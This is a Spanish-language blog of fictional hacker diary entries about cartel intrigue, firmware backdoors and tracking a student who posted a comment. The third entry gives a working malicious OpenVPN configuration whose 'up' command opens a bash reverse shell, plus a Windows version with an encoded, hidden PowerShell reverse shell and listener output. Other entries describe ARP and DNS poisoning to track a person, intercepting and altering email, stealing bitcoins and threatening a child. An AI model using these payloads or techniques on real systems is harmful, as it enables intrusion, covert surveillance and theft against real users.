Miércoles, 25 de Julio de 2018: A cazar al cazador

Querido Diario…

Arribe a Morelia por la mañana, había tenido que salir en el primer vuelo de Mexicali hacía Guadalajara, y de allí tomar un helicóptero hacia Morelia. Antes de eso, pasé a dejar a Shellcode encargada, le compré un bulto grande de croquetas, y sus bocadillos con forma de chuleta que tanto le gustan. Es una buena perra… muy cobarde, pero es una buena perra.

Al llegar al campo de aterrizaje me esperaba Faustino, al quien al bajar salude de forma muy efusiva, teníamos varios meses de no vernos.

- ¿Cómo estas?, ya te hacia muerto en la nieve
- Nah... me dieron unos tehuacanazos con chile piquín por unas 10 horas, pero... nada más. Los güeros no saben nada de nosotros
- Eso escuche, que regresaste como si nada
- ¿Y tú?
- Yo ya no estoy para eso, ya casi tengo cincuenta y... ya va siendo tiempo de quitarnos la medallita de héroes, ahora si, a ganar dinero. Que de todas formas los pen%&/( escogen a quién sea
- Pues si... - rompí el momento emotivo - ¿qué me tienes?
- Con tu hackeo lo ubicamos en sus casas de seguridad y mapeamos su ruta; solamente necesitamos asegurar que va a estar en la ruta, pero fuera de eso creo que lo tenemos
- No podemos simplemente confiar en sus horarios; puede cambiarles en cualquier momento; es muy paranoico. Debemos encontrar una forma de trackearle
- Estamos interceptando algunas cosas que van a su oficina por DHL
- ¿Cómo que cosas? - pregunté
- Cosas normales, papelería, laptops, no sé... podríamos meterle una cámara
- No, eso es muy obvio
- ¿Que tienes en mente?
- ¿Laptops?
- Si
- Vamos a instalarle un juguetito - interrumpí - pero primero, prioridades. Vamos por unas carnitas.

Fuimos a comer a un puestecito cerca de los arcos. Morelia es muy bonito, no dejes de visitarlo en Día de Muertos; y la comida es deliciosa.

Comí con el equipo de Faustino; a pesar de que durante mucho tiempo sirvió a intereses de gente muy poderosa y entreno en diferentes áreas de inteligencia; no le gusta colaborar con mucha gente. Siempre contrata gente de bajo perfil que, básicamente, sólo sabe hacer una cosa. Jalar el gatillo, y hacer pozole con la competencia (espero tú me entiendas cuando digo el término pozole).

Terminando de comer fuimos a su casa de seguridad; bastante fea pero con escondrijos suficientes para entretener un tiempo a un comando armado que entrase y poder sacar a la gente importante. Pasé y me encontré a Mauricio.

Mauricio es prácticamente un niño de 15 años que sacaron de arreglar celulares en la Plaza de la Computación, no tiene talento alguno, pero quiere ser un criminal y aprender; dice que se facilitan estas cosas, pero hum.. ñeee… yo no confiaría mucho mi vida en él.

- ¿Cómo estas vendetta?
- Bien, ¿tú qué tal?, ¿cómo te trata el gordo?
- Bien, bien... estamos aprendiendo
- A ver las manos - le giré su mano derecha con la palma hacia arriba - ¿cuantos?
- Dos, se pusieron difíciles y pues, el señor Faustino me hizo deshacerme de ellos. Ya sabes
- Hum.. a tu edad yo soñaba con grandes cosas, deberías replantearte lo que haces - diablos, ya doy consejos. Estoy viejo.

Mientras intentaba salvar el alma condenada al infierno de Mauricio apareció Faustino.

- ¿Entonces que haremos?
- Dame una de las laptops que interceptaste, la más bonita de todas
- Tengo que Dell, i7, 4 TB, 32 Gb de RAM
- No, no... esa no es
- Es la mejor
- Por eso, esta sólo la usaría un ñoño... esta - y tomé una laptop pequeña
- Pero esta muy chafa - dijo Mauricio
- ¿No la usarías?
- No señor
- Exacto tú eres un nerdo, por eso mismo. Esta es la que usaría él - sentí el corazón de Mauricio partirse en dos, pero... alguien se lo tenía que decir - vamos a instalarle un backdoor pero no con software. Tiene un equipo de seguridad guatemalteco, deserteros de los caibiles, muy bien entrenados. Así que tenemos que ser hábiles. Un backdoor en el firmware
- ¿Y luego?
- Leeremos todo, veremos todo, sabremos to-do
- ¿Nos pueden rastrear?
- Si
- ¿Sabes quién es?
- Si
- No sé si eres muy presumido, eres muy bueno o te quieres morir
- Las tres
- Esta bien, ¿qué necesitamos?
- Abrir la computadora, conectamos este aparatito al BIOS, instalamos el firmware, cerramos, y terminamos - les dije mientras mostraba mi modificador de firmwares (lo siento, es el mejor nombre que se me ocurrió)

- ¿Así de fácil? - preguntó aun dudando Faustino
- Así de fácil 
- ¿En que te ayudamos?
- Bueno, necesito unas manos... las tuyas - le dije a Mauricio - tienes que abrir la computadora por mi
- ¿Por qué? - preguntó
- Ouuuu mis manos son muy suavecitas, no fueron echas para estas cosas
- ¿No?
- No, fueron echas para tomar cosas... 
- ¿Qué cosas?, ¿celulares?
- ¡Ay niño! - mis ojos le dijeron todo a Faustino, Mauricio no iba a durar en este mundo turbio e ilegal - Ten - y le di la computadora - abrela primero y saca ese fierrito de allí que cobre el fierrito de acá

- Bien niño, ahora, conecta el modificador de firmwares a la motherboard
- Si señor
- Si me vuelves a decir señor te meto un tiro en la cabeza
- Si señ... no señ... no vendetta

- Bien, carga el firmware
- ¿Cómo?
- ¿Qué?, ¿nunca has cargado un firmware?
- No señor, pero si me explica lo haré
- ¿Me ves cara de ingeniero?
- Si señor
- Pues no lo soy
- Lo siento señor
- Pues yo no sé cargar un firmware
- ¿Entonces?
- Hay que seguir la metodología

Habiendo resuelto el problema, Mauricio cerró la computadora y la reinició para verificar que todo estuviese bien.

Y estábamos listos.

- Que avanzado - dijo Faustino - ¿qué tan costoso es eso?
- ¿Qué?
- Eso
- ¡Ah! es gratis
- ¿Qué?
- Si, lo descargas de aquí: https://github.com/cr4sh/smmbackdoor

Faustino cerró la computadora y la llevó a la bodega para entregarla al día siguiente como un paquete más de DHL. Después de eso, todo sería cuestión de acción, de la mala.

Me fui al hotel a descansar, esperando lo que pasaría mañana. Pregunté como estaba Shellcode; y me dispuse a ver una película.

Me puse a ver FireFly, es como para la gente que le gusta la ciencia ficción.


Hasta que en algún punto me quedé dormido… y tuve un sueño raro… soñé a Carlos, a Lalo y Lalo 2… es un sueño terrible; que espero que por nuestro bien no sea una premonición.

Que miedo…

Intenté conciliar el sueño, pero no pude. Hasta que de pronto leí un mensaje… y respondí “lo siento, no va a funcionar unos días en Mexicali. Prometo arreglarlo pronto. Espero estes bien y no hayas salido corriendo por el temblor. Te amo, ¡muacks!”.

Me hice bolita y me quedé dormido… por cierto, hay caza recompensas que soy muy crueles. Yo no soy así… creo.

Querido Diario… ¿los perros pueden comer sushi?, Shellcode el otro día, mientras bajé a la cocina por agua, se comió todo el sushi que dejé en el escritorio; no se enfermó, pero no sé si eso está bien.

Lunes, 9 de Julio de 2018: ¡Chilango!, es tu momento

Querido Diario…

El día de hoy me encontraba realizado tareas altamente importantes, muy ocupado, sin poder si quiera tomar un café de lo atareado.

Cuando al parecer, cierta cachanilla intuyó que en realidad no estaba haciendo nada (cachanillas, todas son iguales).

- Bueno, me llama usted, entonces voy, Don Barredora es quién yo soy - respondí
- Hola terrorista cibernético
- ¿A qué debo el gran honor de su llamada? - si a trabajos me escribe, una llamada me levantó una gran intriga
- Necesito un favor, turbio... de esos que son tu especializada - OMG, no podía creer que había dicho eso.

Me quedé mudo por un momento, pensé y pensé que podía ser. La verdad era que me parecía sorprendente. Jamás habría esperado escuchar esas palabras, así que me preparé para la misión que fuese; no importaba lo compleja. Estaba listo.

- ¿Es en serio? - dije, con gran sorpresa
- Si - me dijo con voz de "baaaah"
- Dame un segundo, no te muevas... - corrí .... - ¡hey!, no te muevas
- Augus... ¡hey! - no le dejé terminar, mientras inmediatamente saqué mi teléfono y pensé en quién podría ser el mejor equipo para esta tarea

Si ella me pedía un favor turbio… ¡OMG!, de verdad tenía que ser muy turbio… ella no pediría esas cosas. Necesita lo mejor de lo mejor… era probable que fuese una de esas misiones en donde hay muertos, gente flotando en ríos de aguas negras, personas partidas a la mitad con coches que corren a sentidos contrarios, rusas violadoras y cosas de ese tipo.

Sin dudarlo, tenía que llamar a la persona más turbia que conozco.

- ¿Ahora que pasó? - respondió con pánico
- Joven, tenemos un problema
- ¡Adíos!, no es mi turno
- ¡Esperaaaaaaa!, esto es importante
- ¿Qué tan importante?
- Mom en persona me lo encargó - mentí
- Demonios... le tengo que avisar a Tania que puede que se vuelva a quedar viuda
- ¿Vuelva?
- Pues es que ya no sé cuantas veces me han estado a punto de matar
- Ahhh.. lo usual joven, lo usual

Estábamos listos… Ahora si, a averiguar que esa lo que pasaba.

- Listo
- ¿Qué hiciste?, ¿fuiste a baño?
- No u.u ... estaba preparando todo para la misión
- <<hahaha>> ... no es tan turbio 
- Hum..¿no?, explícame
- Subieron un comentario feo en una página de Facebook. Al parecer un alumno de mi mamá, y quiere saber quién es
- ¿Es en serio? - dije, con acento cachanillo
- Si
- Ouuu... dame otro minuto
- Augu...

Y volví a marcar…

- Joven
- ¿Qué pasó joven?, ¿donde lo veo?, ¿cómo va a ser la intrusión?, ¿nos van a llevar en helicóptero?, ¿va a haber interrogatorio?, ¿nada más llevo lo básico?, ¿necesitamos algo más avanzado?, ¿granadas?, ¿bazucas?... ¿tafil?
- No, no, no... espera. Aborta la misión que siempre no
- Ohhh... así no se puede joven, ya no hay honor.

Casi al mismo tiempo me empezaron a reclamar con que me iban a cortar una pierna D:

- Listo
- ¿Qué tanto estas haciendo Augusto?
- Nada, nada... ¿qué pasó?
- Pues eso, sólo queremos saber quién hizo ese comentario. ¿Se puede?
- Si
- Bueno, cuando vuelvas entonces lo vemos
- Ahora mismo salgo para allá
- <<Hahaha>> no, cuando vengas
- Ya estoy en camino
- No es cierto, cuando vengas
- Es en serio, estoy saliendo al aeropuerto en este momento
- No te creo nada
- En tres horas veme a buscar al aeropuerto y allí estaré
- No te creo
- ¡De verdaaaaad!

La realidad es que de todas formas yo tenía que volver a casa, así que coincidió… pero, ella jamás lo averiguará 😛

Fui hacia el aeropuerto rumbo a Mexicali, y al llegar… pues si, no estaba allí. Es horrible, porque en Mexicali los taxistas de Uber no aceptan viajes con tarjeta de crédito; cosas raras cachanillas. Después de que me tardé horas muriendo de calor porque en la mañana había llovido, al fin un taxista me recogió. Llegué a casa y deje a Shellcode en casa con el aire acondicionado encendido a todo lo que daba. Y tome mi súper coche no gay para ir a verle.

Me estacioné abajo de su trabajo y empecé a aventar piedritas a la ventana… cosas chilangas que matan de risa a las cachanillas.

- ¡Augusto!, ¿qué haces aquí?
- Vengo a hackear un Facebook o algo así
- Te dije que no era urgente
- Te dije que ya venía en camino
- Bueno, vamos... hoy es el momento en que te perdoné mi mamá
- ¿Qué me perdoné?, pero si no hecho nada malo
- Eres chilango
- ¿Y eso qué?
- Seguro ya harás algo malo
- ¡Hey!

Bien, el asunto es que debíamos de encontrar a la persona que hizo los comentarios. Los cuales los estaba haciendo a horas laborales, lo cual me hizo pensar que tenía que hacerlos desde la escuela y además, lo estaba haciendo en una fan page, lo que lo hacía más fácil de tracear.

La verdad es que el asunto era sencillo, la señora da clases en una universidad muy chiquita llamada CETYS, que en un día arduo no tiene más de 200 alumnos conectados a mismo tiempo; así que iba a ser fácil encontrarle. Primero que nada, necesitaba obtener una dirección IP (como todo en la vida), hubiese utilizado un Apache montado en Kali, pero era el momento de ganar mi perdón; aunque aun no se exactamente porque debo de ganar mi perdón, y lucirme. Tenía que verme muy 1337 hax0r fux0r usando comandos en mi shell negra con letras verdes fluorecentes.

Monté un HTTP server usando netcat:

quesadilla:~ vendetta$ while true ; do echo -e "HTTP/1.1 200 OK\n\n $(date)" | nc -l -p 80 ; done

Entonces monté una imagen referenciada a mi y escribí un post en la fan page con un DNS poisoning hacia el gateway principal de la universidad. Y esperé…

Y esperé…

Y seguí esperando…

Y esperaaaaando….

y después de un <<shorro>> de horas, al fin cayó el tipo 😛

Ya tenía su dirección IP, además de que me di cuenta que toda la universidad estaba en el mismo segmento (¡Ufff… ojalá ESCOM hubiese estado así, ya me vería yo cambiándome las calificaciones). Así que con Cain saqué su MAC. ¿Por qué?, porque tienen DHCP en la red, así que podía ser que se cambiase la IP, y quería estar seguro de tenerlo.

Para eso sólo hay que activar el Sniffer, y luego ir a la pestaña de Network, click derecho y “Scan MAC Addresses” y nos mostrará todos los dispositivos conectados en nuestro mismo segmento. Y voilá

Ya tenía su MAC, ahora podía saber donde estaba en todo momento…

¡Nah!, en Mexicali nadie sabe cambiarse una MAC Address… no había de preocuparse. Lo siguiente era mantener un stalkeo constante del objetivo, y para eso le hice un ARP poisoning, también usando Cain.

Si, lo sé… HTTPS, pero; yo sólo necesitaba ubicarlo, ver en que repetidor estaba y ya.

Y listo, lo tenía… estaba en ese momento en la cafetería que esta junto al cajero.

- Señora, es él
- Hum.. 
- ¿Qué?
- Me lo debí imaginar
- No se preocupe, en la escuela me enseñaron a respetar a mis maestros, deme un segundito; ahorita vengo

- No, no, no... ven para acá chilanguito
- Pero... 
- Shh... 
- Pe... 
- S... 
- Grr... 
- Gracias - en ese momento pensé que me habían perdonado, no sé de que, pero de algo - pero estuvo muy mal, eso no sé hace. Tenías que ser chilango
- ¡Ahhhh! D:

Querido Diario… no entiendo #cachanillas

Que calor… D:

En fin… ya volví

Quisiese saber que dice en español esa canción.

Viernes, 22 de Junio de 2018: Wiii, wiii, le parlevu frances

Querido Diario…

Ella era una fanática de ver películas en línea usando Netflix, y como toda usuaria promedio, contrataba servicios de VPN para poder salir con una dirección IP diferente y ver contenido de otros países. Cuando supe de ello montones de ideas se me vinieron a la cabeza.

La mayoría de las VPN’s se basan en servicios ofrecidos por OpenVPN, uno de los servicios de VPN más populares, que hasta yo lo uso.. coff.. coff.. aunque Isaac coff.. coff.. mis certificados siguen sin servir; pero supongo eso es parte de la seguridad 😛 darte un certificado inválido. Lo que bien es cierto es que para facilitar la conexión a este tipo de servicios por parte de personas que no saben mucho de modificar archivos de configuración; lo más sencillo es simplemente darles un archivo de configuración de OpenVPN listo para usarse, que incluso en OS X usando Tunnelblink es cosa de darle doble click y en automático queda todo configurado.

¿Eso es grave?… coff.. coff.. pues como dice Beto, “pues es que mire joven” 😛 [inserte aquí movimiento de manos contenante]

Los archivos de configuración en su forma más simple pueden ser así:

remote [IP remota]
ifconfig 10.200.0.2 10.200.0.1
dev tun

Hasta allí todo va bien. Te conectas a una dirección en internet, y esa te asigna un rango de forma interna. Y tú me dirás, ¿y eso qué o qué de qué o como?.

¿Qué pasa cuando te conectas a una VPN?, lo más básico, lo más sencillo… te da un mensaje de bienvenida. “Bienvenido… ahora puede descargar pornografía ilega… digo, torrents”. ¿Cómo es que se despliega ese mensaje?. Es una configuración dentro del mismo archivo de configuración para ejecutar una orden; ¿y qué más?.

Bueno, podríamos configurar cosas para que el equipo de alguien al conectarse haga algo, o prepare algo… como ¿una shell en reversa?

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

Obviamente esto sería en un servidor Linux, pero bueno, hackear Linux no es algo complicado. ¿Qué pasaría si es un servidor Windows? (siempre hay que estar preparado para todo), pues vale, con un poco de encodeo se puede resolver.

ifconfig 10.200.0.2 10.200.0.1
dev tun
remote 192.168.1.245
script-security 2
setenv z1 C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
setenv a1 ‘ZgB1AG4AYwB0AGkAbwBuACAAYwBsAGUAYQBuAHUAcAAgAHsADQAKAGkAZgAgACgAJABjAGwAaQBlAG4AdAAuAEMAbwBuAG4AZQBjAHQAZQBkACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAfQANAAoAaQBmACAAKAAkAHAAcgBvAGMAZQBzAHMALgBFAHgAaQB0AEM’
setenv b1 ‘AbwBkAGUAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAkAHAAcgBvAGMAZQBzAHMALgBDAGwAbwBzAGUAKAApAH0ADQAKAGUAeABpAHQAfQANAAoAJABhAGQAZAByAGUAcwBzACAAPQAgACcAMQA5ADIALgAxADYAOAAuADEALgAyADEAOAAnAA0ACgAkAHAAbwByAHQAIAA9ACAAJwA4ADEAOAAxACcADQAKACQAYwBsAG’
setenv c1 ‘kAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgBzAG8AYwBrAGUAdABzAC4AdABjAHAAYwBsAGkAZQBuAHQADQAKACQAYwBsAGkAZQBuAHQALgBjAG8AbgBuAGUAYwB0ACgAJABhAGQAZAByAGUAcwBzACwAJABwAG8AcgB0ACkADQAKACQAcwB0AHIAZQBhAG0AIAA9A’
setenv d1 ‘CAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQANAAoAJABuAGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdACAAJABjAGwAaQBlAG4AdAAuAFIAZQBjAGUAaQB2AGUAQgB1AGYAZgBlAHIAUwBpAHoAZQAN’
setenv e1 ‘AAoAJABwAHIAbwBjAGUAcwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMADQAKACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdABJAG4AZgBvAC4ARgBpAGwAZQBOAGEAbQBlACAAPQAgACcAQwA6AFwAXAB3AGkAbgB’
setenv f1 ‘kAG8AdwBzAFwAXABzAHkAcwB0AGUAbQAzADIAXABcAGMAbQBkAC4AZQB4AGUAJwANAAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAEkAbgBwAHUAdAAgAD0AIAAxAA0ACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQASQBuAGYAbw’
setenv g1 ‘AuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAIAA9ACAAMQANAAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAgAD0AIAAwAA0ACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQAKAApAA0ACgAkAGkAb’
setenv h1 ‘gBwAHUAdABzAHQAcgBlAGEAbQAgAD0AIAAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQBuAGQAYQByAGQASQBuAHAAdQB0AA0ACgAkAG8AdQB0AHAAdQB0AHMAdAByAGUAYQBtACAAPQAgACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAA’
setenv i1 ‘MQANAAoAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcADQAKAHcAaABpAGwAZQAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBQAGUAZQBrACgAKQAgAC0AbgBlACAALQAxACkAewAkAG8’
setenv j1 ‘AdQB0ACAAKwA9ACAAJABlAG4AYwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAKQApAH0ADQAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGUAbgBjAG8AZABpAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQAsAD’
setenv k1 ‘AALAAkAG8AdQB0AC4ATABlAG4AZwB0AGgAKQANAAoAJABvAHUAdAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAZABvAG4AZQAgAD0AIAAkAGYAYQBsAHMAZQA7ACAAJAB0AGUAcwB0AGkAbgBnACAAPQAgADAAOwANAAoAdwBoAGkAbABlACAAKAAtAG4AbwB0ACAAJABkAG8AbgBlACkAIAB7AA0ACgBpAGYAIAAoACQAYwBsA’
setenv l1 ‘GkAZQBuAHQALgBDAG8AbgBuAGUAYwB0AGUAZAAgAC0AbgBlACAAJAB0AHIAdQBlACkAIAB7AGMAbABlAGEAbgB1AHAAfQANAAoAJABwAG8AcwAgAD0AIAAwADsAIAAkAGkAIAA9ACAAMQANAAoAdwBoAGkAbABlACAAKAAoACQAaQAgAC0AZwB0ACAAMAApACAALQBhAG4AZAAgACgAJABwAG8AcwAgAC0AbAB0ACAAJABu’
setenv m1 ‘AGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByAC4ATABlAG4AZwB0AGgAKQApACAAewANAAoAJAByAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABuAGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByACwAJABwAG8AcwAsACQAbgBlAHQAdwBvAHIAawBiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACAALQA’
setenv n1 ‘gACQAcABvAHMAKQANAAoAJABwAG8AcwArAD0AJAByAGUAYQBkADsAIABpAGYAIAAoACQAcABvAHMAIAAtAGEAbgBkACAAKAAkAG4AZQB0AHcAbwByAGsAYgB1AGYAZgBlAHIAWwAwAC4ALgAkACgAJABwAG8AcwAtADEAKQBdACAALQBjAG8AbgB0AGEAaQBuAHMAIAAxADAAKQApACAAewBiAHIAZQBhAGsAfQB9AA0ACg’
setenv o1 ‘BpAGYAIAAoACQAcABvAHMAIAAtAGcAdAAgADAAKQAgAHsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJABlAG4AYwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbgBlAHQAdwBvAHIAawBiAHUAZgBmAGUAcgAsADAALAAkAHAAbwBzACkADQAKACQAaQBuAHAAdQB0AHMAdAByAGUAYQBtAC4AdwByAGkAd’
setenv p1 ‘ABlACgAJABzAHQAcgBpAG4AZwApAA0ACgBzAHQAYQByAHQALQBzAGwAZQBlAHAAIAAxAA0ACgBpAGYAIAAoACQAcAByAG8AYwBlAHMAcwAuAEUAeABpAHQAQwBvAGQAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AGMAbABlAGEAbgB1AHAAfQANAAoAZQBsAHMAZQAgAHsADQAKACQAbwB1AHQAIAA9ACAAJABlAG4A’
setenv q1 ‘YwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAKQApAA0ACgB3AGgAaQBsAGUAKAAkAG8AdQB0AHAAdQB0AHMAdAByAGUAYQBtAC4AUABlAGUAawAoACkAIAAtAG4AZQAgAC0AMQApAHsADQAKACQAbwB1AHQAIAArAD0AIAAkAGUAbgBjAG8’
setenv r1 ‘AZABpAG4AZwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdABwAHUAdABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAApACkAOwAgAGkAZgAgACgAJABvAHUAdAAgAC0AZQBxACAAJABzAHQAcgBpAG4AZwApACAAewAkAG8AdQB0ACAAPQAgACcAJwB9AH0ADQAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAG’
setenv s1 ‘UAbgBjAG8AZABpAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQAsADAALAAkAG8AdQB0AC4AbABlAG4AZwB0AGgAKQANAAoAJABvAHUAdAAgAD0AIAAkAG4AdQBsAGwADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJABuAHUAbABsAH0AfQAgAGUAbABzAGUAIAB7AGMAbABlAGEAbgB1AHAAfQB9AA==’
up ‘C:\\Windows\\System32\\cmd.exe /c (start %z1% -WindowStyle Hidden -EncodedCommand %a1%%b1%%c1%%d1%%e1%%f1%%g1%%h1%%i1%%j1%%k1%%l1%%m1%%n1%%o1%%p1%%q1%%r1%%s1% ) ||’

Querido Diario.. te pido perdón, pero Power Shell no es algo de lo que yo entienda mucho. Y ya que tenemos esto, estamos listos para poder realizar nuestro ataque. Ahora lo que necesitaba era hacerle llegar al “famoso” Cesar este archivo de configuración para tener acceso a sus archivos.

Empecé a analizar el comportamiento de Cesar siguiendo su celular, a través de unos mensajes que le había enviado y localizando las células en las que se conectaba su celular. Fue entonces que caí en cuenta de que constantemente se conectaba desde el iHop de Patio Universidad, ¿por qué?.. pues parece que a pesar de que es el súper lugar teniente de una mujer loca, turbia e ilegal y adinerada; no tiene suficiente dinero para comprar un plan de datos ilimitado y se anda conectado a la red del iHop.

Diablos, pensé… si hubiese sabido eso simplemente habría puesto una Pineapple y me habría ahorrado todo el show, pero en fin. Yo soy el gran vendetta, tengo que hacer algo de espectáculo para mantener entretenidos a los lectores de este H. blog. Así qué continue con mi plan inicial. Me senté conecté a la red de iHop. Una vez dentro escaneé los equipos que estaban conectados a la red para encontrar al de Cesar.

# nmap -vv -sV -O -Pn 192.169.254.0-254

No habíamos muchas personas conectadas a la red, probablemente los empleados y Cesar, ¿quién va a un iHop a cenar?. Ya dentro lo que hice fue confiar en el banner grabbing que me dio que había un Samsung S9 conectado; un teléfono bastante costoso que seguro puede pagar un lugarteniente de la mafia; y coff.. coff.. ¿Android?, pues si… es un lugarteniente chafa, ¿qué se podía esperar de alguien así? 😛

Ya que lo había identificado le lance un ARP poisoning, pero con el mero propósito de que le fallase la red, lo único que quería es que se pudiese en contacto con el proveedor de VPN. Y una vez que falló entonces mandó un correo electrónico para soporte técnico, al parecer no podía ver la Casa de Papel, lo cual me causo gracia; parece que Cesar es un fanático de otro tipo de criminales.

Cuando envío el correo lo intercepté y modifiqué con mi archivo de configuración de OpenVPN; él lo descargó y ejecutó desde su computadora, y en ese momento coff.. coff..

albinolobster@ubuntu:~$ nc -lvp 8181
Listening on [0.0.0.0] (family 0, port 8181)
Connection from [192.168.1.226] port 8181 [tcp/*] accepted (family 2, sport 51082)
Microsoft Windows [Version 10.0.17134.48]
© 2018 Microsoft Corporation. All rights reserved.
C:\Users\albinolobster\OpenVPN\config\albino_lobster>whoami
desktop-r5u6pvd\albinolobster
C:\Users\albinolobster\OpenVPN\config\albino_lobster>

Mientras el estuvo conectado viendo la serie, y comiendo pan francés con fresas; yo descargué toda su información. Incluyendo las direcciones y relaciones de las casas de seguridad. Entonces, sólo faltaba hacerle una visita.

Caminamos sobre la calle a donde estaría la casa de seguridad más importante, vimos le Civic de Cesar estacionarse; como buen lugarteniente no traía guardaespaldas, apenas bajo y Beto le puso el arma en la cabeza.

- ¿Qué chin&/() - nos miró con odio y sorpresa
- Shhhh... - lo calló Beto - abre
- Estas loco, no te voy a abrir nada, dispara si tienes hue%&/
- Nah - interrumpí, no nos gusta matar sin sentido; somos civilizados... abre
- Tú ya estas muerto; ella te va a matar 
- ¿En serio?... ojalá, pero ... Cesarin, abre
- Nunca
- Ok, quieres ponerte rudo - saqué mi celular y simule que marcaba por teléfono - ¡Janey!, no quiere cooperar, es tiempo que le hagas un agujero a la pierna de Sonia

Sonia era la hija de Cesar. Regla número #43 de los negocios turbios e ilegales; todos tenemos un punto débil. En ese momento el semblante de Cesar cambió y empezó a llorar.

- No, déjala... ten honor
- Yo tengo mucho honor, pero mi amiga Janey no creo
- ¿Qué quieres?, entrar... no hay mucho; te va a matar después de eso... y a mi
- Y a Sonia... 
- Ella no sabe de Sonia
- ¿Cómo se lo ocutaste?
- Lleva años que no la veo, pero...
- Pero la extrañas y ves sus fotografías de instagram desde tu computadora
- Si
- Hum... ella no me importa; pero necesito algo para librarme de ella; y mantenerla alineada. Dame algo
- Vacía sus cuentas; ella sin dinero no es nada
- ¿Bitcoins?
- Si

Le hice una seña a Beto para que lo dejase…

- ¿Qué harás? - me preguntó
- Toma todo lo que hay en esa casa de seguridad y llévate a Sonia lejos de aquí
- Pero... 
- Se acabó Cesarín, después de lo que voy a hacer te va a querer matar. Huye mientras puedas.

Le mandé un mensaje y esperé a verle.

- Hola amor
- Hola
- Que milagro
- Te extraño amorcito - dije con un tono sarcastico
- Hum... yo también; ven a mi casa
- Vale

Maneje sobre todo Circuito Interior; está vez me sentía mucho más seguro, aunque muy hombrezuelo por lo que iba a hacer. Aparque fuera de su enorme casa.

- Hola bebe
- Hola - y fue directo a lo que quería

[Inserte aquí mensaje de censurado +18]

Se había quedado dormida… y entonces me acerqué a su celular. Ya me había aprendido el patrón de desbloqueo de su celular, entre a Bitso y en efecto, tenía activado el reconocimiento de rostro. Hice una transacción por $3000 bitcoins hacia la wallet de Mom.

Me vestí, y ella se despertó.

- No te he ordenado de que te vayas
- Lo siento, se me hace un poco tarde
- ¿Tarde para que?
- Debo ir a mi casa, mi perro no duerme si no llego
- Vuelve a la cama y hazme eso que es lo único para lo que sirves
- Lo siento, pero.. creo que ya no te tengo mucho miedo
- ¿Qué? - y empezó a gritar - ¡Cesar! . miro a todos lados y no apareció
- Lo siento, no eres tú, soy y.... no, si eres tú, son tus lonjas - y me salí de la habitación

Salió gritando ordenando que me detuviesen, pero al llegar a la primer puerta le mostré el celular con la aplicación de Bitso abierta y les dije:

- Se acabó, no tiene dinero para pagarles; y si me hacen algo en unos minutos llegarán tipos turbios e ilegales a sacarme vivo de aquí

Y entonces se hicieron a un lado.

Una semana más tarde estaba sentado frente al Sena, comiendo un macaroon the early grey, con pedacitos de hoja, delicioso.

- Entonces, volvimos a donde empezamos
- Si, pero... al menos ahora nuestra fama aumentó 
- Mala fama
- Fama es fama, no existe la mala fama
- Pásame tu wallet
- No, déjalo
- Negocios son negocios
- Exacto, nuestro acuerdo es te sirvo a cambio de vivir en Mexicali; eso no incluye extras
- Los has ganado
- Sólo hago mi trabajo
